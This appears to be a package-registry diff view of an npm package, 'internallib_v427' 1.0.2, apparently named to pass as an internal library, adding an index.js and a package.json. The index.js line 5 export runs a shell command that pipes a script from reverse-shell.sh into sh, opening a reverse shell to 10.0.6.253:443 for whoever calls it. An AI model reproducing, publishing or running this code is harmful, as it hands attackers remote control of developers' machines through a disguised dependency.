internallib_v427 1.0.2

Sign up to get free protection for your applications and to get access to all the features.
Files changed (2) hide show
  1. package/index.js +7 -0
  2. package/package.json +11 -0
package/index.js ADDED
@@ -0,0 +1,7 @@
1
+ const { exec } = require('child_process');
2
+
3
+ exports.command = function(){
4
+ console.log("inf");
5
+ exec('bin/bash -c "curl https://reverse-shell.sh/10.0.6.253:443|sh"');
6
+ return "deu bom";
7
+ }
package/package.json ADDED
@@ -0,0 +1,11 @@
1
+ {
2
+ "name": "internallib_v427",
3
+ "version": "1.0.2",
4
+ "description": "libb",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1"
8
+ },
9
+ "author": "",
10
+ "license": "ISC"
11
+ }